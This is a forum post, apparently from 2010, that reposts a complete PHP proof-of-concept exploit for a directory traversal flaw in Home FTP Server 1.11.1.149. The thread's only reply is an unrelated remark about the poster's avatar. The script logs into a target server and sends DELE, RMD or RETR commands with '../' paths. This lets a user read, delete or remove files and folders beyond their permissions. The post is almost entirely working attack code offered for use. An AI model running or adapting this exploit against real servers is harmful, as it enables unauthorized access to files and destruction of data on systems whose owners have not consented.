Gonzalez Posted November 15, 2010 Report Share Posted November 15, 2010 <?php# _ ____ __ __ ___# (_)____ _ __/ __ \/ /_____ ____/ / _/_/ |# / // __ \ | / / / / / //_/ _ \/ __ / / / / /# / // / / / |/ / /_/ / ,< / __/ /_/ / / / / /# /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/ # Live by the byte |_/_/ ## Members:## Pr0T3cT10n# -=M.o.B.=-# TheLeader# Sro## Contact: inv0ked.israel@gmail.com## -----------------------------------# The following is a proof of concept exploit for a path traversal vulnerability that exists in Home FTP Server.# The vulnerability allows an unprivileged attacker to read files and delete files & folders whom he has no permissions to.# The vulnerable FTP commands are:# * RETR - Read File# * DELE - Delete File# * RMD - Remove Directory#-----------------------------------# Exploit Title: Home FTP Server v1.11.1.149 Remote Directory Traversal Exploit# Date: 31/10/2010# Author: Pr0T3cT10n# Software Link: http://downstairs.dnsalias.net/files/HomeFtpServerInstall.exe# Affected Version: 1.11.1.149# Tested on Windows XP Hebrew, Service Pack 3# ISRAEL, NULLBYTE.ORG.IL###error_reporting(E_ALL);if(count($argv) <= 4) { echo("\r\n# Usage: {$argv[0]} [HOST] [PORT] [USER] [PASS]\r\n"); echo("\tHOST - An host using Home FTP Server\r\n"); echo("\tPORT - Default is 21\r\n"); echo("\tUSER - Username\r\n"); echo("\tPASS - Password\r\n"); exit("\r\n");} else { $CMD = ''; $CFG = Array('file' => $argv[0], 'host' => $argv[1], 'port' => $argv[2], 'user' => $argv[3], 'pass' => $argv[4]); $sock = fsockopen($CFG['host'], $CFG['port'], $errno, $errstr, 5); if($sock) { echo("(+) Connected to the FTP server at '{$CFG['host']}' on port {$CFG['port']}\r\n"); $read = fread($sock, 1024); fwrite($sock, "USER {$CFG['user']}\r\n"); $read = fread($sock, 1024); fwrite($sock, "PASS {$CFG['pass']}\r\n"); $read = fread($sock, 1024); echo("(~) What would you like to do?\r\n\t1.Remove File\r\n\t2.Remove Directory\r\n\t3.Read File\r\n"); $CHSE = rtrim(fgets(STDIN)); if($CHSE == 1) { $CMD.= "DELE"; echo("(~) Path to file(for example: ../../../test.txt): "); $PATH = rtrim(fgets(STDIN)); if($PATH != '') { fwrite($sock, "{$CMD} {$PATH}\r\n"); echo(fread($sock, 1024)); } else { exit("(-) Empty path.\r\n"); } } elseif($CHSE == 2) { $CMD.= "RMD"; echo("(~) Path to directory(for example: ../../../test): "); $PATH = rtrim(fgets(STDIN)); if($PATH != '') { fwrite($sock, "{$CMD} {$PATH}\r\n"); echo(fread($sock, 1024)); } else { exit("(-) Empty path.\r\n"); } } elseif($CHSE == 3) { $CMD.= "RETR"; echo("(~) Path to file(for example: ../../../test.txt): "); $PATH = rtrim(fgets(STDIN)); if($PATH != '') { fwrite($sock, "PASV\r\n"); $read = fread($sock, 1024); $xpld = explode(',', $read); $addr_tmp = explode('(', $xpld[0]); $address = "{$addr_tmp[1]}.{$xpld[1]}.{$xpld[2]}.{$xpld[3]}"; $port_tmp = explode(')', $xpld[5]); $newport = ($xpld[4]*256)+$port_tmp[0]; fwrite($sock, "{$CMD} {$PATH}\r\n"); $read = fread($sock, 1024); $socket = fsockopen($address, $newport, $errno, $errstr, 5); if($socket) { echo(fread($socket, 1024)); } } else { exit("(-) Empty path.\r\n"); } } else { exit("(-) You have to choose correctly.\r\n"); } } else { exit("(-) Unable to connect to {$CFG['host']}:{$CFG['port']}\r\n"); }}?>-Gonzalez Quote Link to comment Share on other sites More sharing options...
DanISR Posted November 15, 2010 Report Share Posted November 15, 2010 pff inainte aveai un avatar mai fain Quote Link to comment Share on other sites More sharing options...
